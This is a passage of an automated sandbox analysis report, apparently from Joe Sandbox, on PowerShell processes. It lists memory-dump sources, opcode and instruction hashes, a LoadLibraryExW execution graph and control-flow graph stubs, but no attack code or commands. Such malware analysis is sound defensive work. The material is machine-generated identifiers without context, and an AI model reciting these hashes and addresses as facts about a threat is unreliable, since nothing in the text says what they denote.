                                                              • Opcode ID: 0179e4e11261bc914ac4b447a8cfa043e72d9d74dc54ce7b9b1df5b9abf562b0
                                                              • Instruction ID: 2183ec2d3baa6de83e2a374fd108089bb99e212eebec8c4d9c1089949e50bb9e
                                                              • Opcode Fuzzy Hash: 0179e4e11261bc914ac4b447a8cfa043e72d9d74dc54ce7b9b1df5b9abf562b0
                                                              • Instruction Fuzzy Hash: D841C7D6A0D7C26AD313523918F60DA7F95DF53278B0D00F7C6D8CA093AD0D284AA6A2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0328f295ac66053d3876e34dacf2a701add2e53708bbbd514123a9dcd8dde279
                                                              • Instruction ID: 6ea3e36e2cc8b009ee0f6934545db76415c5e6be4bd8f18c32170ea8eab7d076
                                                              • Opcode Fuzzy Hash: 0328f295ac66053d3876e34dacf2a701add2e53708bbbd514123a9dcd8dde279
                                                              • Instruction Fuzzy Hash: 104179D6A0DBC39AD313523D18F50D5BF92EF9327970801F6C698CA1C3BD0C396A9692
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08c1879fbc56b7adc7c984cda0a5b63f825ab14ad0141810c3543dc4d30b0373
                                                              • Instruction ID: 6d737b238f7bb5945767cfe54134c683b63993aba1cbc880dbe4c4127cee1ff7
                                                              • Opcode Fuzzy Hash: 08c1879fbc56b7adc7c984cda0a5b63f825ab14ad0141810c3543dc4d30b0373
                                                              • Instruction Fuzzy Hash: D741749790D7D29AE752862C5CEE0D57F95FF13264B0900FBC6898B093EE1D2816D391
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3092043425.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34760000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78bb376fe4877b4de9d5794c9f04aaf23171db290218c5dbfea98f9297984eb4
                                                              • Instruction ID: b31fefe572f737d18e7762418b7cfa85722e1e78f666d0804648b8befaa43b74
                                                              • Opcode Fuzzy Hash: 78bb376fe4877b4de9d5794c9f04aaf23171db290218c5dbfea98f9297984eb4
                                                              • Instruction Fuzzy Hash: C141B882E0E6C29FE75287344C6E1797F94AF4325079944FECA85CB097E84C6D2993D3
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3099583882.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd34830000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6e4be232f623c5b33c1cc19bdac701bb01fe5cdc50822f9668af0341a7eeea4
                                                              • Instruction ID: 5ba748f04596ea7cab8bfa73325ed9e6ac716575f197f6e20f39f903ea3ca837
                                                              • Opcode Fuzzy Hash: c6e4be232f623c5b33c1cc19bdac701bb01fe5cdc50822f9668af0341a7eeea4
                                                              • Instruction Fuzzy Hash: A231D88148F3C25FD39383B499755827FF55E47124B4E81EBC5C4CE8A3D58E588AD362

                                                              Execution Graph

                                                              Execution Coverage:2.8%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 9633 7ffd34796c34 9634 7ffd34796c3d LoadLibraryExW 9633->9634 9636 7ffd34796ced 9634->9636

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3215828140.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34780000_powershell.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: f55b522753654025210d13819d7cfd71dc2f84ecb033aa76889b8d5b4bd7171b
                                                              • Instruction ID: 82a72eaefe3b37cc891378053c261e62855058ac6e73522f9c771dff28f5a2a0
                                                              • Opcode Fuzzy Hash: f55b522753654025210d13819d7cfd71dc2f84ecb033aa76889b8d5b4bd7171b
                                                              • Instruction Fuzzy Hash: 4131F37190CA5C8FDB19DFA89889AE9BBE0FF56320F04822BD009D3152CB74A415CB91

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3219023005.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34850000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1A_L
                                                              • API String ID: 0-1522723599
                                                              • Opcode ID: 37eb0f9dd2c73a8fd17d7bb6dd4a6edd2fb73aa65e84e0b96131b5d8e449842f
                                                              • Instruction ID: c0ae480b25b255ae98e40409075672cb683692529fba253d0c9772f0099953dc
                                                              • Opcode Fuzzy Hash: 37eb0f9dd2c73a8fd17d7bb6dd4a6edd2fb73aa65e84e0b96131b5d8e449842f
                                                              • Instruction Fuzzy Hash: 0C913931B0DB854FDB5ADB2888A59657BE1EF6B30070901EED489CB1A3D929FC46C781

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3219023005.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34850000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1A_L
                                                              • API String ID: 0-1522723599
                                                              • Opcode ID: b90e1f140991584861a03d12e386854c025359e3dc491130bbbe490997916567
                                                              • Instruction ID: 1defac1f908cd8cf65e8a82280af348930eb4faa3e99428d07a6ea0f777cece8
                                                              • Opcode Fuzzy Hash: b90e1f140991584861a03d12e386854c025359e3dc491130bbbe490997916567
                                                              • Instruction Fuzzy Hash: 9671C231B0DA4A4FDB99DB1CC4A592577E2EF6B30470502AED449CB6A2D925FC82C781

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 365 7ffd348535ee-7ffd348535fb 366 7ffd348535fd-7ffd34853607 365->366 367 7ffd3485360b 365->367 368 7ffd34853609 366->368 369 7ffd34853627-7ffd34853656 366->369 371 7ffd34853610-7ffd34853625 367->371 368->371 375 7ffd3485365d-7ffd3485366f 369->375 371->369
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3219023005.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34850000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d892b8848c18a93e8f1ba7fed5891c359c3642d7003b26250b600887d42ce965
                                                              • Instruction ID: e49d3578f37fcd6170b462394c278dc3103080caea01e08b39acbdf19e502ebf
                                                              • Opcode Fuzzy Hash: d892b8848c18a93e8f1ba7fed5891c359c3642d7003b26250b600887d42ce965
                                                              • Instruction Fuzzy Hash: 5D110232B0E6894FEB91DB9884A45A87BE1EF5A310F0800FFD54ED7283DA29A845D351